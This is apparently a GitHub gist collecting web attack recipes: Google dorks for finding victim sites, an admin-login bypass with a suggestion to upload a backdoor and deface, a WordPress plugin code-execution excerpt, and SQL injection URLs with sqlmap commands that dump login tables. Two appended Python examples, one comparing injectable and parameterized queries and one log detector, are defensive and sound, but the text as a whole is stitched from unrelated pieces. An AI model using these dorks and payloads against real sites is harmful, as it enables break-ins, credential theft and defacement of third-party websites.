Gist dreadpiratesr/2dab641a16c2d9bad7c9
Created November 5, 2015 16:21
Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:"Supercon Infoservices"

Product Description
-------------------
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.

Vulnerability Details
---------------------
First type the dork [inurl:/webadmin/login.php intext:"Supercon Infoservices"]
Then find a site on which "Copyright © [Version] Supercon Infoservices(P) Ltd." is written in the footer.
Now, go to its admin page http://www.targetsite.com/webadmin/login.php
After opening the admin panel, follow this link http://www.targetsite.com/webadmin/manage-gallery.php
And voila, you will be logged directly into the admin panel, and you can also upload your backdoor and deface :) .
Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution
Google Dork : inurl:wp-content/plugins/better-wp-security
Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php
Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php

    public function admin_tooltip_ajax() {
        global $itsec_globals;

        // A valid 'itsec_tooltip_nonce' must accompany the request; otherwise it dies.
        if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) {
            die();
        }

        if ( sanitize_text_field( $_POST['module'] ) == 'close' ) {
            $data = $itsec_globals['data'];
            $data['tooltips_dismissed'] = true;
            update_site_option( 'itsec_data', $data );
        } else {
            // The request-supplied 'module' value is used directly as a key into
            // $this->tooltip_modules and the stored 'callback' entry is invoked with
            // no arguments; nothing checks that the key exists before the lookup.
            call_user_func_array( $this->tooltip_modules[ sanitize_text_field( $_POST['module'] ) ]['callback'], array() );
        }

        die(); // this is required to return a proper result
    }
Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:"/cms/cms.php?link_id="
1- get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
   we will have the database name
2- we search the "contact us" page
3- we use the "http header" to get the data names (all post data are injectable; I will use the first in this example)
4- we use the sqlmap tool now and inject it with the POST method
   EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]
#admin page: http://website/admin/index.php
Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
Dork Google: inurl:/admin-ajax.php?action=go_view_object
######################
Poc via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
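The two injection styles above (the boolean-based blind payload `viewid=1 and 1=2` / `475 AND 7403=7403`, and the string-built query it relies on) can be reproduced and compared against a parameterized version. This is an added example, not code from the gist or from the Gallery Objects plugin: it uses an in-memory SQLite table (constructed here; the real plugin uses MySQL through $wpdb) with a made-up `objects` schema, and shows why the true/false conditions give distinguishable results in the vulnerable lookup and why integer validation plus parameter binding removes that oracle.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the plugin's gallery-object table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE objects (id INTEGER PRIMARY KEY, name TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO objects VALUES (?, ?, ?)",
        [(1, "alpha", 1), (2, "beta", 0), (475, "gamma", 1)],
    )
    return conn


def vulnerable_lookup(conn, viewid):
    """The anti-pattern: the raw request parameter is pasted into the SQL text,
    so 'viewid=1 and 1=2' becomes part of the WHERE clause."""
    sql = f"SELECT id, name FROM objects WHERE id = {viewid}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, viewid):
    """Hardened form: the parameter must be a positive integer (WordPress code
    would use absint()), and the value is bound, never interpolated."""
    try:
        n = int(viewid)
    except (TypeError, ValueError):
        return None  # reject the request instead of coercing it
    if n <= 0:
        return None
    return conn.execute("SELECT id, name FROM objects WHERE id = ?", (n,)).fetchall()


def oracle_distinguishable(lookup, conn):
    """True when appending a true vs. a false condition changes the result set,
    which is exactly the signal a boolean-based blind injection depends on."""
    return lookup(conn, "1 and 1=1") != lookup(conn, "1 and 1=2")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, viewid=475 AND 7403=7403 ->", vulnerable_lookup(db, "475 AND 7403=7403"))
    print("vulnerable oracle visible:", oracle_distinguishable(vulnerable_lookup, db))
    print("safe, same payload ->", safe_lookup(db, "475 AND 7403=7403"))
    print("safe oracle visible:", oracle_distinguishable(safe_lookup, db))
```

The sqlmap output quoted above ("AND boolean-based blind - WHERE or HAVING clause") is the tool noticing the same thing `oracle_distinguishable` reports: the page body differs between the true and false variants. With the bound parameter both variants are rejected identically, so there is nothing to infer from.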
Polish CMS - SQL Injection
{-} Vulnerable Versions => All Versions So Far.
{x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl
{x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl
-------------------------------------------------------------------
File:
index.php {HomePage}
Vulnerable Parameters:
[id] , [j] , [s] , [lang]
Administration Panel:
/admin/
Exploit Title: PRIVATE CSR
Google Dork : inurl:"/config/config.izo"
# Priv8 SCR Editors
#
#######################################################
# Use Editors To Edit Config Files And Deface The Site Via CSR Editors.
#######################################################
#
# [+] Example:
#http://lom-radioX.com/config/config.izo
#http://kesbangpolbuXlukumba.info/config/config.izo
#http://www.mirgosXtinits.ru/config/config.izo
#http://sacredodysXsey.com/config/config.izo
#http://www.biohXgienica.com/config/config.izo
#######################################################
# [+] Deface Page: www.site.com/config/tar.tmp
#######################################################
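Every entry in this gist leaves a recognisable trace in a web server's access log: the updatexml/concat error-based payload, the `AND n=n` boolean-blind probe, a request to an admin sub-page such as /webadmin/manage-gallery.php from a client that never fetched /webadmin/login.php, and a 200 response for /config/config.izo served straight out of the webroot. The detector below is an added example written for this page, not code from the gist or from any of the products named in it. The log lines are constructed (documentation-range IPs, combined log format) and mirror the requests quoted above; the rule names and the `scan` function are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (combined log format). The requests reproduce the
# patterns quoted in the gist; the IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Nov/2015:16:21:01 +0000] "GET /cms/cms.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+ HTTP/1.1" 500 512 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Nov/2015:16:21:03 +0000] "GET /wp-admin/admin-ajax.php?action=go_view_object&viewid=475%20AND%207403%3D7403&type=html HTTP/1.1" 200 2048 "-" "sqlmap/1.0"
198.51.100.7 - - [05/Nov/2015:16:22:10 +0000] "GET /webadmin/manage-gallery.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Nov/2015:16:22:12 +0000] "GET /config/config.izo HTTP/1.1" 200 128 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Nov/2015:16:23:00 +0000] "GET /cms/cms.php?link_id=4 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Nov/2015:16:23:05 +0000] "GET /webadmin/login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Injection signatures matched against the URL-decoded request target.
SQLI_RULES = [
    ("error-based (updatexml/extractvalue)", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("mysql version-comment concat", re.compile(r"/\*!\d{5}\s*concat\*/", re.I)),
    ("boolean tautology", re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I)),
    ("quote followed by sql keyword", re.compile(r"'\s*(and|or|union)\b", re.I)),
]
SCANNER_UA = re.compile(r"sqlmap", re.I)
ADMIN_PAGE = re.compile(r"^/webadmin/(?P<page>[^/?]+\.php)", re.I)
WEBROOT_CONFIG = re.compile(r"^/config/config\.izo$", re.I)


def parse_line(line):
    """Split one combined-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text):
    """Return alert dicts {ip, ts, path, reason} for suspicious requests.

    Admin-page alerts are stateful: a client that has fetched /webadmin/login.php
    earlier in the log is assumed to have a legitimate session."""
    alerts = []
    seen_login = set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        decoded = unquote_plus(rec["path"])
        path_only = decoded.split("?", 1)[0]
        found = []

        for reason, rx in SQLI_RULES:
            if rx.search(decoded):
                found.append(reason)
        if SCANNER_UA.search(rec["ua"]):
            found.append("scanner user-agent")

        admin = ADMIN_PAGE.match(path_only)
        if admin:
            if admin.group("page").lower() == "login.php":
                seen_login.add(rec["ip"])
            elif rec["ip"] not in seen_login and rec["status"] == "200":
                found.append("admin page served without visiting login")

        if WEBROOT_CONFIG.match(path_only) and rec["status"] == "200":
            found.append("config file served from webroot")

        for reason in found:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "path": decoded, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["ip"]:<14} {a["reason"]:<42} {a["path"]}')
```

The admin-page rule is deliberately weak evidence on its own (a session cookie set on an earlier day would look the same), so it is worth correlating with the application's own login records; the error-based and tautology rules, by contrast, have almost no benign matches on a content site and can page straight away.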